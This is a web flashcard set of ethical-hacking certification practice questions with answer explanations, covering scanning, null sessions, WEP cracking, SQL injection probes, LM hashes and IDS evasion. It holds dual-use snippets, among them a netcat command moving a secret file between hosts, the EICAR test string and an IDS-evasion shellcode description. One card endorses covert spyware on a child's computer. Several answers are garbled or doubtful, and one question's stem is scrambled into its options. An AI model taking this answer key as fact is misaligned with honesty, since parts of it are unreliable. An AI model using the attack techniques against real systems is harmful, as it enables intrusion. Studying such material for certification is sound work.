• Shuffle
    Toggle On
    Toggle Off
  • Alphabetize
    Toggle On
    Toggle Off
  • Front First
    Toggle On
    Toggle Off
  • Both Sides
    Toggle On
    Toggle Off
  • Read
    Toggle On
    Toggle Off
Reading...
Front

Card Range To Study

through

image

Play button

image

Play button

image

Progress

1/547

Click to flip

Use LEFT and RIGHT arrow keys to navigate between flashcards;

Use UP and DOWN arrow keys to flip the card;

H to show hint;

A reads text to speech;

547 Cards in this Set

  • Front
  • Back

Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? A. Gif-It-Up B. Image Hide C. NiceText D. Snow

D. SnowSnow is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
In the context of Trojans, what is the definition of a Wrapper?A. A tool used to encapsulate packets within a new header and footerB. An encryption tool to protect the TrojanC. A tool used to calculate bandwidth and CPU cycles wasted by the TrojanD. A tool used to bind the Trojan with a legitimate file
D. A tool used to bind the Trojan with a legitimate file. Wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code
When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this?A. nfscopyB. macofC. filesnarfD. webspy
C. FilesnarfFilesnarf - sniffs files from NFS traffic. OPTIONS:-i "Interface" (Specify the interface to listen on)-v "Versus" mode. (Invert the sense of matching, toselect non-matching files.pattern (Specify regular expression for filename matching.)expression (Specify a tcpdump(8) filter expression to selecttraffic to sniff.)SEE ALSODsniff, nfsd
Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generatetraffic on the network so that he can capture enough packets to crack the WEP key?A. Use a session replay on the packets capturedB. Use KisMAC as it needs two USB devices to generate trafficC. Use any ARP requests found in the captureD. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic
D. Use Ettercap. By forcing the network to answer to a lot of ICMP messages you can gather enough packets tocrack the WEP key.
The following is an entry captured by a network IDS. You are assigned the task of analyzing thisentry. You notice the value 0x90, which is the most common NOOP instruction for the IntelA. The attacker is attempting a buffer overflow attack and has succeededB. The buffer overflow attack has been neutralized by the IDSC. The attacker is creating a directory on the compromised machineD. The attacker is attempting an exploit that launches a command-line shellprocessor. You figure that the attacker is attempting a buffer overflow attack. You also notice"/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack?
D. The attacker is attempting an exploit that launches a command line shell.
Bill has started to notice some slowness on his network when trying to update his company's website and while trying to access the website from the Internet. Bill asks the help desk manager if he has received any calls about slowness from the end users, but the help desk manager says that he has not. Bill receives a number of calls from customers that cannot access the company website and cannot purchase anything online. Bill logs on to a couple of his routers and notices that the logs show network traffic is at an all time high. He also notices that almost all the traffic is originating from a specific address.Bill decides to use Geotrace to find out where the suspect IP is originates from. The Geotrace utility runs a traceroute and finds that the IP is coming from Panama. Bill knows that none of his customers are in Panama so he immediately thinks that his company is under a Denial of Service attack. Now Bill needs to find out more about the originating IP address. What Internet registry should Bill look in to find the IP address?A. RIPE LACNICB. APNICC. ARIND. LACNIC
LACNIC is the Latin American and Caribbean Internet Addresses Registry that administers IPaddresses, autonomous system numbers, reverse DNS, and other network resources for thatregion.
Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible.What is the first character that Bob should use to attempt breaking valid SQL request?A. Semi ColumnB. Single QuoteC. Exclamation MarkD. Double Quote
B. Single quote. In SQL single quotes are used around values in queries, by entering another single quote Bob tests if the application will submit a null value and probably returning an error.
Angela is trying to access an education website that requires a username and password to login.When Angela clicks on the link to access the login page, she gets an error message stating that the page cannot be reached. She contacts the website's support team and they report that no one else is having any issues with the site. After handing the issue over to her company's ITdepartment, it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education website's server. Since Angela's computer is behind acorporate firewall, her computer cannot ping the education website back.What can Angela's IT department do to get access to the education website?A. Use an Internet browser other than the one that Angela is currently usingB. Change the settings on the firewall to allow all incoming traffic on port 80C. Change the IP on Angela's computer to an address outside the firewallD. Change the settings on the firewall to allow all outgoing traffic on port 80
C. Change the IP on Angela's computer to an address outside the firewall. Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses ICMP. The browser used by the user will not make any difference. The only alternative here that would solve the problem is to move the computer to outside the firewall.
Null sessions are un-authenticated connections (not using a username or password.) to an NT or2000 system. Which TCP and UDP ports must you filter to check null sessions on your network? A. 137 and 139B. 137 and 443C. 139 and 445D. 139 and 443
C. 139 and 445. NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol thatexist primarily for trust relationships. You can establish a NULL session with a Windows host bylogging on with a NULL user name and password. Primarily the following ports are vulnerable ifthey are accessible: 137-139, 445. While ports 137-139 were known technically as "NBT over IP", port 445 is "SMB over IP". (SMB is known as "Samba" and stands for "Server Message Blocks".) After all of the trouble the personal computer industry has had with Microsoft's original Windows NetBIOS ports 137 through 139, it is difficult to imagine or believe that Microsoft could have actually made things significantly worse with their replacement port 445 . . . but they did.
What type of port scan is shown below?Scan directed at open port:A. Windows ScanB. Idle ScanC. SYN Stealth ScanD. XMAS Scan
D. XMAS Scan
Null sessions are un-authenticated connections (not using a username or password.) to an NT or2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?A. 137 and 139B. 137 and 443C. 139 and 445D. 139 and 443
C. 139 and 445.NULL sessions take advantage of "features" in SMB (Server Message Block) protocol that exist primarily for trust relationships. You can establish a NULL session with a Windows host by logging on with a NULL userID and password.
An attacker runs netcat tool to transfer a secret file between two hosts:Machine A: netcat -l -p 1234 < secretfileachineHe is worried about information being sniffed on the network. How would the attacker use netcat toencrypt the information before transmitting onto the wire?A. netcat 192.168.3.4 > 1234B. Use cryptcat instead of netcatC. Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat 1234D. Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat 1234E. Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat 1234 -pw password
B. Use Cryptcat. Netcat cannot encrypt hte file transfer itself, but would need to sue a third party application to encrypt/decrypt like openssl. Cryptcat is the standard netcat enhanced with twofish encryption.
LAN Manager passwords are concatenated to 14 bytes, and split in half. The two halves arehashed individually. If the password is 7 characters or less, than the second half of the hash is always:A. 0xAAD3B435B51404AAB. 0xAAD3B435B51404CCC. 0xAAD3B435B51404BBD. 0xAAD3B435B51404EE
D. 0xAAD3B435B51404EEThe problem with LM stems form the total lack of salting or cipher block chaining in the hashing process. To hash a PW, the first 7 bytes of it are transformed into an 8 byte odd parity DES key. This key is used to encrypt the 8 byte string. "KGS!@". Same thing happens with the second part of the PW. This lack of salting creates two interesting consequences: First the PW is always stored in the same way (begging for a lookup table attack). Second, it is easier to determine whether a PW is bigger than 7 bytes in size. If it is not, the last 7 bytes will all be null and result in a consistent DES hash of 0xAAD3B435B51404EE.
Lori has just been tasked by her supervisor toonduct vulnerability scan on the corporatenetwork.She has been instructed to perform a very thorough test of the network to ensure thatthere are no security holes on any of the machines.Lori's company does not own any commercialscanning products, so she decides to download a free one off the Internet.Lori has never done a vulnerability scan before, so she is unsure of some of the settings available in the software shedownloaded.One of the options is to choose which ports that can be scanned.Lori wants to do exactly what her boss has told her, but she does not know what ports should be scanned.If Lori is supposed to scan all known TCP ports, how many ports should she select in thesoftware?A. 1025B. 1024C. 65536D. Lori should not scan TCP ports, only UDP ports
C. 65536In both TCP and UDP, each packet header will specify a source port and a destination port, each of which is a 16 bit unsigned integer (e.g. ranging from 0 to 65535)
Hackers usually control Bots through:A. MSN MessengerB. Trojan client softwareC. GoogleTalkD. Yahoo ChatE. IRC Channel
E. IRC ChannelMost of the bots have a function to connect to a predetermined IRC channel to receive orders.
NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying tointercept the traffic from a victim machine to a corporate network printer. You are attempting tohijack the printer network connection from your laptop by sniffing the wire.Which port does SMB over TCP/IP use?A. 445B. 139C. 179D. 443
A. Port 445
You ping a target IP to check if the host is up. You do not get a response. You suspect ICMP isblocked at the firewall. Next you use hping2 tool to ping the target host and you get a response.Why does the host respond to hping2 and not ping packet?[ceh]# ping 10.2.3.4PING 10.2.3.4 (10.2.3.4) from 10.2.3.80 : 56(84) bytes of data.--- 10.2.3.4 ping statistics ---3 packets transmitted, 0 packets received, 100% packet loss[ceh]# ./hping2 -c 4 -n -i 2 10.2.3.4HPING 10.2.3.4 (eth0 10.2.3.4): NO FLAGS are set, 40 headers +0 data byteslen=46 ip=10.2.3.4 flags=RA seq=0 ttl=128 id=54167 win=0 rtt=0.8 mslen=46 ip=10.2.3.4 flags=RA seq=1 ttl=128 id=54935 win=0 rtt=0.7 mslen=46 ip=10.2.3.4 flags=RA seq=2 ttl=128 id=55447 win=0 rtt=0.7 mslen=46 ip=10.2.3.4 flags=RA seq=3 ttl=128 id=55959 win=0 rtt=0.7 ms--- 10.2.3.4 hping statistic ---4 packets tramitted, 4 packets received, 0% packet lossround-trip min/avg/max = 0.7/0.8/0.8 msA. hping2 uses TCP instead of ICMP by defaultB. you must use ping10.2.3.4 switchC. ping packets cannot bypass firewallsD. hping2 uses stealth TCP packets to connect
A. hping2 uses TCP instead of ICMP by defaultDefault protocol is TCP, by default hping2 will send tcp headers to target host's port 0 with awinsize of 64 without any tcp flag on. Often this is the best way to do an 'hide ping', useful whentarget is behind a firewall that drop ICMP. Moreover a tcp null-flag to port 0 has a good probability of not being logged.
In the context of Windows Security, what is a 'null' user?A. An account that has been suspended by the adminB. A pseudo account that was created for security administration purposeC. A pseudo account that has no username and passwordD. A user that has no skills
C. A pseudo account that has no username and password. NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol thatexist primarily for trust relationships. You can establish a NULL session with a Windows host bylogging on with a NULL user name and password. Using these NULL connections allows you togather the following information from the host: * List of users and groups * List of machines * Listof shares * Users and host SID' (Security Identifiers)NULL sessions exist in windows networking to allow: * Trusted domains to enumerate resources *Computers outside the domain to authenticate and enumerate users * The SYSTEM account toauthenticate and enumerate resourcesNetBIOS NULL sessions are enabled by default in Windows NT and 2000. Windows XP and 2003 will allow anonymous enumeration of shares, but not SAM accounts.
Which definition below best describes a covert channel?A. A server program using a port that is not well knownB. It is one of the weak channels used by WEP that makes it insecureC. Making use of a protocol in a way it was not intended to be usedD. It is the multiplexing taking place on a communication link
C. Making use of a protocol in a way it was not intended to be used. A covert channel is a hidden communication channel not intended for information transfer at all.Redundancy can often be used to communicate in a covert way. There are several ways that hidden communication can be set up.
You have installed antivirus software and you want to be sure that your AV signatures are working correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software.You would like to write a harmless test virus, which is based on the European Institute for Computer Antivirus Research format that can be detected by the AV software.How should you proceed?A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*B. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*C. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*D. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
B. Type the following code in notepad and save the file as EICAR.COM. Your antivirus protram springs into action whenever you attempt to open, run or copy it.
Paula works as the primary help desk contact for her company.Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death and he can nolonger work. Paula walks over to the user's computer and sees the Blue Screen of Deathscreen.The user's computer is running Windows XP, but the Blue Screen looks like a familiar one that Paula had seen on Windows 2000 computers periodically.The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there.Paula also noticed that the hard drive activity light was flashing, meaningthat the computer was processing something.Paula knew this should not be the case since the computer should be completely frozen during a Blue Screen. She checks the network IDS live log entries and notices numerous nmap scan alerts. What is Paula seeing happen on this computer?A. Paula's network was scanned using FloppyscanB. There was IRQ conflict in Paula's PCC. Paula's network was scanned using DumpsecD. Tools like Nessus will cause BSOD
A. Paula's network was scanned using Floppyscan. Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk.
How would you describe an attack where an attacker attempts to deliver the payload over multiplepackets over long periods of time with the purpose of defeating simple pattern matching in IDSsystems without session reconstruction? A characteristic of this attack would be a continuousstream of small packets.A. Session SplicingB. Session StealingC. Session FragmentationD. Session Hijacking
A. Session Splicing
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. Heconcludes that since his access points require the client computer to have the proper SSID, itwould prevent others from connecting to the wireless network. Unfortunately unauthorized usersare still able to connect to the wireless network. Why do you think this is possible?A. The SSID is still sent inside both client and AP packetsB. Bob forgot to turn off DHCPC. Bob's solution only works in ad-hoc modeD. All access points are shipped with a default SSID
A and B. The SSID is still sent inside both client and AP packets, and Bob forgot to turn of DHCP. All access points are shipped with a default SSID unique to the manufacturer. E.g. 3COM uses the default comcomcom.
What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?A. Encryption of agent communications will conceal the presence of the agentsB. Alerts are sent to the monitor when a potential intrusion is detectedC. An intruder could intercept and delete data or alerts and the intrusion can go undetectedD. The monitor will know if counterfeit messages are being generated because they will not be encrypted
D. The monitor will know if counterfeit messages are being generated because they will not be encrypted.
Ron has configured his network to provide strong perimeter security. As part of his networkarchitecture, he has included a host that is fully exposed to attack. The system is on the publicside of the demilitarized zone, unprotected by a firewall or filtering router. What would you call such a host? Choose all that are correct.A. DMZ hostB. HoneypotC. DWZ hostD. Bastion Host
B, D.Ron has set up both a bastion Host and a honeypot. A bastion host is a gateway between an inside network and an outside network. Used as a security measure, the bastion host is designed to defend against attacks aimed at the inside network. Depending on the complexity of the network and its configuration, a single bastion host may stand guard by itself, or be part of a larger security system with layers of protection.
Bob is going to perform an active session hijack against Brownies Inc. He has found a target thatallows session oriented connections (Telnet) and performs the sequence prediction on the targetoperating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next?A. Reverse sequence predictionB. Take one of theparties offlineC. Guess the sequence numbersD. Take over the session
C. Guess the sequence numbers
Which of the following snort rules look for FTP root login attempts?A. alert ftp -> ftp (content:"user password root";)B. alert tcp any any -> any any 21 (content:"user root";)C. alert tcp -> any port 21 (message:"user root";)D. alert tcp -> any port 21 (msg:"user root";)
B. alert tcp any any -> any any 21 (content: "user root";)The snort rule header is built by defining action (alert), protocol (tcp), from IP subnet port (anyany), to IP subnet port (any any 21), Payload Detection Rule Options (content:"user root "; )
An attacker has been successfully modifying the purchase price of items purchased at a web site.The security administrators verify the web server and Oracle database have not beencompromised directly. They have also verified the IDS logs and found no attacks that could havecaused this. What is the mostly likely way the attacker has been able to modify the price?A. By using SQL injectionB. By changing hidden form values in a local copy of the web pageC. By using cross site scriptingD. There is no way the attacker could do this without directly compromising either the web server or the database
B. By changing hidden form values in a local copy of the web page. Changing hidden form values is possible when a web site is poorly built and is trusting the visitor's computer to submit vital data like the price of a product, to the database.
Why is Social Engineering considered attractive by hackers and commonly done by experts in thefield?A. It is easy and extremely effective to gain informationB. It is done by well-known hackersC. It does not require a computer in order to commit a crimeD. It is not considered illegal
A. It is easy and extremely effective to gain information. Social engineering is a collection of techniques used to manipulate people into performing actionsor divulging confidential information. While similar to a confidence trick or simple fraud, the termtypically applies to trickery for information gathering or computer system access and in most (butnot all) cases the attacker never comes face-to-face with the victim. The term has beenpopularized in recent years by well known (reformed) computer criminal and security consultantKevin Mitnick who points out that it's much easier to trick someone into giving you his or herpassword for a system than to spend the effort to hack in. He claims it to be the single mosteffective method in his arsenal.
Harold just got home from working at Henderson LLC where he works as an IT technician. He was able to get off early because they were not too busy. When he walks into his home office, he notices his teenage daughter on the computer, apparently chatting with someone online. As soonas she hears Harold enter the room, she closes all her windows and tries to act like she was playing a game. When Harold asks her what she was doing, she acts very nervous and does not give him a straight answer. Harold is very concerned because he does not want his daughter to fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs that will restrict the sites his daughter goes to, because he doesn't want to alert her to his trying to figure out what she is doing.Harold wants to use some kind of program that will track her activities online, and send Harold an email of her activity once a day so he can see what she has been up to. What kind of software could Harold use to accomplish this?A. Install VNC on her computerB. Install hardware Keylogger on her computerC. Enable Remote Desktop on her computerD. Install screen capturing Spyware on her computer
D. Install screen capturing spyware on her computer.
How do you defend against ARP Spoofing?A. Use ARPWALL system and block ARP spoofing attacksB. Use private VLANSC. Tune IDS Sensors to look for large amount of ARP traffic on local subnetsD. Place static ARP entries on servers, workstation and routersChoose all that apply.
B, C, D: Use private VLANs, Tune IDS sensors to look for large amounts of ARP traffic on local subnets, and place static ARP entries on servers, workstations and routers. ARPWALL is an opensource tool that will give early warning when an arp attack occurs.
Jim's organization just completed a major Linux roll out and now all of the organization's systemsare running the Linux 2.5 kernel. The roll out expenses have imposed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in functionality of Linux can achieve this?A. IP ChainsB. IP ICMPC. IP SnifferD. IP Tables
D. IP Tables.iptables is a user space application that allows a sysadmin to configure the netfilter tables, chains and rules (described above) Because iptables requires elevated privileges to operate, it must be executed by user root, otherwise it fails to function. On most Linux systems, iptables is installed as /usr/sbin/iptables. iptables performs stateful inspection while the older ipchains only performs stateless inspection.
Richard is a network administrator working at a student loan company in Iowa. This company processes over 20,000 student loans a year from colleges all over the state. Most communicationbetween the company, schools, and lenders is carried out through email. Because of privacy lawsthat are in the process of being implemented, Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Much of the email communication used athis company contains sensitive information such as social security numbers. For this reason, Richard wants to utilize email encryption agency-wide. The only problem for Richard is that hisdepartment only has a couple of servers, and they are utilized to their full capacity. Since a serverbased PKI is not an option for him, he is looking for a low/no cost solution to encrypt email.What should Richard use?A. 3DESB. RSAC. PGPD. OTP
C. PGP. PGP is an encryption program being used for the secure transmission of files and e-mails. This adapts public-key encryption technology, in which pairs of keys are used to maintain secure communication. In PGP communication, the sender and the receiver each have public and private key pairs.
Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What protocol is most likely to be listening on those ports?A. SMBB. FingerC. FTPD. Samba
A. SMBPort 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on top of the Session Service and the Datagram service of NetBIOS.
What does ICMP (type 11, code 0) denote?A. Destination UnreachableB. Unknown TypeC. Source QuenchD. Time Exceeded
D. Time exceeded.An ICMP Type 11, Code 0 means Time Exceeded (RFC792) Code 0 = Time to Live exceeded in transit, and Code 1 = Fragment Reassembly Time Exceeded.
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication inWindows XP?A. Disable LM authentication in the registryB. Disable LSASS service in Windows XPC. Stop the LM service in Windows XPD. Download and install LMSHUT.EXE tool from Microsoft's website
A. Disable LM authentication in the registry.
Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the Department of Defense's front end Exchange Server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. Which tool would best be used to accomplish this?A. SMBCrackB. RainbowCrackC. SmurfCrackD. PSCrack
B. RainbowCrack.RainbowCrack is a general purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash-cracker. A traditional brute force cracker tries ALL possible plaintexts one at a time, and this is a time consuming way to break a complex password. The idea of a time-memory tradeoff is to do all cracking-time computation in advance, and store the results in a "rainbow table." Once the precomputation is finished, a time-memory trade off cracker can be hundreds of times faster than a brute-force cracker.
Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS?A. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instructionpointer to a random place of choiceB. He can use polymorphic shellcode ?with a tool such as ADMmutate - to change the signature ofhis exploit as seen by a network IDSC. He can use a dynamic return address to overwrite the correct value in the target machine'scomputer memoryD. He can use a shellcode that will perform a reverse telnet back to his machine
B. He can use polymorphic shellcode, with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDSADMmutate is using a polymorphic technique designed to circumvent certain forms of signaturebased intrusion detection. All network based remote buffer overflow exploits have similarities inhow they function. ADMmutate has the ability to emulate the protocol of the service the attacker isattempting to exploit. The data payload (sometimes referred to as an egg) contains the instructionsthe attacker wants to execute on the target machine. These eggs are generally interchangeableand can be utilized in many different buffer overflow exploits. ADMmutate uses several techniquesto randomize the contents of the egg in any given buffer overflow exploit. This randomizationeffectively changes the content or 'signature' of the exploit without changing the functionality of theexploit.
Which of the following encryption is not based on block cipher?A. DESB. BlowfishC. RC4D. AES (Rijndael)
C. RC4. RC4 is used in numerous protocols including SSL and WEP.
SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. The signature of attack for SYN Flood contains:A. The source and destination port numbers having the same valueB. A large number of SYN packets appearing on a network with the corresponding reply packetsC. A large number of SYN packets appearing on a network without the corresponding replypacketsD. The source and destination address having the same value
C. A large number of SYN packets appearing on a network without the corresponding ACK packets. A SYN attack occurs when an attacker exploits the use of the buffer space during a TransmissionControl Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target systemreplies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable
Nathalie would like to perform a reliable scan against a remote target. She is not concerned aboutbeing stealth at this point. Which of the following type of scans would be the most accurate and reliable?A. A UDP scanB. A FIN scanC. A TCP Connect scanD. A half-scan
C. A TCP Connect scan. The connect ( ) system call provided by your OS is used to open a connection to every interesting port on the machine. If the port is listening, connect ( ) will succeed, otherwise the port isn't reachable. Advantages to this technique include that it doesn't require any elevated privileges. This is the fastest scanning technique supported by nmap, and is available iwth the -t (TCP) option. The downside is that this type of scan is easily detectable and filterable.
Virus Scrubbers and other malware detection program can only detect items they know about.Which of the following tool would allow you to detect unauthorized changes or modification of binary files on your system by unknown malware?A. Anti-Virus SoftwareB. A properly configured gatewayC. File integrity verification toolsD. There is no way of finding out until a new updated signature file is released
C. File integrity verification tools. Programs like Tripwire aid SysAdmins and users in monitoring a designated set of files for any changes. Used with system files on a regular basis, Tripwire and similar tools can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely fashion.
You have successfully brute forced basic authentication configured on a Web server using Brutus hacking tool. The username / password is "Admin" and "Bettlemani@". You logon to the system using the brute forced password and plant backdoors and rootkits.After downloading various sensitive documents from the compromised machine, you proceed to clear the log files to hide your trace.Which event log located at c:\windows\system32\config contains the trace of your brute force attempts?A. SecEvent.EvtB. SysEvent.EvtC. WinEvent.EvtD. AppEvent.Evt
A. SecEvent.EvtThe Security Event log (SecEvent.Evt) will contain all the failed logins against the system.
In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code?A. EAPB. EEPC. ESPD. EIP
D. EIPEIP is the instruction pointer which is a register, it points to your next command.
Samuel is a high school teenager who lives in Modesto California. Samuel is a straight 'A' studentwho really likes tinkering around with computers and other types of electronic devices. Samuel just received a new laptop for his birthday and has been configuring it ever since. While tweaking theregistry, Samuel notices a pop up at the bottom of his screen stating that his computer was nowconnected to a wireless network. All of a sudden, he was able to get online and surf the Internet.Samuel did some quick research and was able to gain access to the wireless router he wasconnecting to and see all of its settings. Being able to hop onto someone else's wireless networkso easily fascinated Samuel, so he began doing more and more research on wireless technologiesand how to exploit them. The next day, Samuel's friend said that he could drive around all overtown and pick up hundreds upon hundreds of wireless networks. This really excited Samuel sothey got into his friend's car and drove around the city seeing which networks they could connectto and which ones they could not.What has Samuel and his friend just performed?A. WardrivingB. WarwalkingC. WarchalkingD. Webdriving
A. Wardriving. Wardriving is the act of searching for Wi-Fi wireless networks by a person in a moving vehicle using a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect the networks.
Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan?A. It is a network fault and the originating machine is in a network loopB. It is a worm that is malfunctioning or hardcoded to scan on port 500C. The attacker is trying to detect machines on the network which have SSL enabledD. The attacker is trying to determine the type of VPN implementation and checking for IPSec
D. The attacker is trying to determine the type of VPN implementation and checking for IPSec. Port 500 is used by IKE (Internet Key Exchange). This is typically used for IPSEC-based VPNsoftware, such as Freeswan, PGPnet, and various vendors of in-a-box VPN solutions such asCisco. IKE is used to set up the session keys. The actual session is usually sent with ESP(Encapsulated Security Payload) packets, IP protocol 50 (but some in-a-box VPN's such as Ciscoare capable of negotiating to send the encrypted tunnel over a UDP channel, which is useful for use across firewalls that block IP protocols other than TCP or UDP).
Rebecca is a security analyst and knows of a local root exploit that has the ability to enable localusers to use available exploits to gain root privileges. This vulnerability exploits a condition in theLinux kernel within the execve() system call. There is no known workaround that exists for thisvulnerability. What is the correct action to be taken by Rebecca in this situation as arecommendation to management?A. Rebecca should make a recommendation to upgrade the Linux kernel promptlyB. Rebecca should make a recommendation to set all child-process to sleep within theexecve()C. Rebecca should make a recommendation to disable theexecve() system callD. Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege
A. Rebecca should make a recommendation to upgrade the Linux kernel promptly.
WWW wanderers or spiders are programs that traverse many pages in the World Wide Web byrecursively retrieving linked pages. Search engines like Google, frequently spider web pages forindexing.How will you stop web spiders from crawling certain directories on your website?A. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to indexB. Place robots.txt file in the root of your website with listing of directories that you don't want to becrawledC. Enable SSL on the restricted directories which will block these spiders from crawlingD. Place authentication on root directories that will prevent crawling from these spiders
B. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled.
Which of the following act in the United States specifically criminalizes the transmission ofunsolicited commercial e-mail (SPAM) without an existing business relationship.A. 2004 CANSPAM ActB. 1990 Computer Misuse ActC. 2005 US-SPAM 1030 ActD. 2003 SPAM Prevention Act
A. 2004 CANSPAM Act. The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited Pornography and Marketing Act) establishes requirements for those who send commercial email, spells out penalties for spammers nad companies whose products are advertised in spam if they violate the law, and gives consumers the right to ask emailers to stop spamming them.
You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?A. The IP range used by the target networkB. An understanding of the number of employees in the companyC. The types of operating systems and applications being usedD. How strong the corporate security policy is
C. The types of operating systems and applications being used. From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using
Samuel is the network administrator of DataX Communications, Inc. He is trying to configure hisfirewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. He isconfident that this rule will secure his network from hackers on the Internet.But he still receives hundreds of thousands brute-force attempts generated from various IPaddresses around the world. After some investigation he realizes that the intruders are using aproxy somewhere else on the Internet which has been scripted to enable the random usage ofvarious proxies on each request so as not to get caught by the firewall rule.Later he adds another rule to his firewall and enables small sleep on the password attempt so thatif the password is incorrect, it would take 45 seconds to return to the user to begin anotherattempt. Since an intruder may use multiple machines to brute force the password, he alsothrottles the number of connections that will be prepared to accept from a particular IP address.This action will slow the intruder's attempts.Samuel wants to completely block hackers brute force attempts on his network.What are the alternatives to defending against possible brute-force password attacks on his site?A. Enforce a password policy and use account lockouts after three wrong logon attempts eventhough this might lock out legit usersB. You cannot completely block the intruders attempt if they constantly switch proxiesC. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address ofthe intruder so that you can block them at the Firewall manuallyD. Enforce complex password policy on your network so that passwords are more difficult to brute force
B. You cannot completely block the intruder's attempt if they constantly switch proxies. Without knowing from where the next attack will come there is no way of proactively block theattack. This is becoming a increasing problem with the growth of large bot nets using ordinary workstations and home computers in large numbers.
Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudgecookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administratorfrom Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her toverify her password with him ''just to double check our records.'' Jane does not suspect anythingamiss, and parts with her password. Jack can now access Brown Co.'s computers with a validuser name and password, to steal the cookie recipe. What kind of attack is being illustrated here?A. Faking IdentityB. Reverse EngineeringC. Social EngineeringD. Spoofing IdentityE. Reverse Psychology
C. Social engineering. Specifically, pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
Which of the following activities would not be considered passive footprinting?A. Perform multiple queries through a search engineB. Search on financial site such as Yahoo FinancialC. Scan the range of IP address found in their DNS databaseD. Go through the rubbish to find out any information that might have been discarded
C. Scan the range of IP addresses found in their DNS database. Passive footprinting is a method in which the attacker never makes contact with the target. Scanning the targets IP addresses can be logged at the target and therefore contact has been made.
